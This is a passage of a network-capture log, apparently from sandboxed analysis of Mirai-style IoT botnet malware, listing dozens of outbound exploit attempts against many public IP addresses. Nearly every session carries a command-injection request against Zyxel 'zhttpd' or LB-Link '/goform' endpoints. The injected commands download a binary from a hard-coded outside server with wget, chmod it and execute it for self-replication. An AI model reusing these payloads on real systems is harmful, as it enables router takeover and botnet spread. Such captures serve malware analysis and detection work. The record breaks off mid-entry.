                                            Jan 14, 2024 15:50:53.698100090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8282192.168.2.234957035.54.16.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698164940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8283192.168.2.234097092.201.162.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698180914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8284192.168.2.2346010174.120.149.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698208094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8285192.168.2.2343764133.118.224.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698254108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8286192.168.2.235032459.104.244.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698275089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8287192.168.2.2355768161.137.3.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698302031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8288192.168.2.236025269.199.76.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698329926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8289192.168.2.23471241.54.233.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698368073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8290192.168.2.234231663.32.193.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698395014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8291192.168.2.2349990197.65.91.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698431015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8292192.168.2.235271090.50.169.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698451042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8293192.168.2.234618413.245.30.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698487997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8294192.168.2.233613497.232.15.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698606968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8295192.168.2.2351798131.221.172.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698622942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8296192.168.2.235219446.50.165.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698648930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8297192.168.2.235967073.171.72.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698678017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8298192.168.2.2342406187.238.69.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698708057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8299192.168.2.2342096107.172.192.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698748112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8300192.168.2.2344582107.198.38.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698767900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8301192.168.2.2358134157.8.2.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698792934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8302192.168.2.234512468.115.90.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698841095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8303192.168.2.2347156178.88.101.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698860884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8304192.168.2.2351390146.56.137.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698908091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8305192.168.2.233311042.34.210.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698935032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8306192.168.2.2355806168.114.210.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698940992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8307192.168.2.233382040.252.128.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698980093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8308192.168.2.2344620135.12.126.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.698982954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8309192.168.2.2336460160.155.255.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.699023008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8310192.168.2.2341996218.208.208.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.699034929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8311192.168.2.233583218.142.250.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:53.699086905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8312192.168.2.235977034.160.163.2008080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.559528112 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8313192.168.2.234199898.174.198.838080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.617180109 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:54.781122923 CET509INHTTP/1.1 400 Bad Request
                                            Content-Type: text/html
                                            Content-Length: 349
                                            Connection: close
                                            Date: Sun, 14 Jan 2024 14:50:53 GMT
                                            Server: lighttpd
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8314192.168.2.2345528125.117.164.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711127043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8315192.168.2.2334632148.53.239.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711163998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8316192.168.2.234352276.52.60.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711188078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8317192.168.2.2334412148.122.131.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711215019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8318192.168.2.2337734200.183.30.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711246014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8319192.168.2.233999074.192.92.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711324930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8320192.168.2.2333624111.248.82.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711369038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8321192.168.2.23499722.9.249.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711431026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8322192.168.2.235443699.60.158.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711466074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8323192.168.2.234140271.62.173.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711508989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8324192.168.2.2344370171.91.164.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711556911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8325192.168.2.2356316184.175.249.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711591959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8326192.168.2.234646271.44.208.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711622000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8327192.168.2.23486985.250.169.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711678982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8328192.168.2.2334326143.238.57.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711736917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8329192.168.2.2335338168.70.221.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711749077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8330192.168.2.235845269.39.4.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711812973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8331192.168.2.2353150152.214.132.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711846113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8332192.168.2.233515092.47.62.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711910009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8333192.168.2.2345260148.8.49.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711922884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8334192.168.2.234265299.252.91.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.711996078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8335192.168.2.234333060.46.0.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:54.712035894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8336192.168.2.2343456160.171.171.136443
                                            TimestampBytes transferredDirectionData
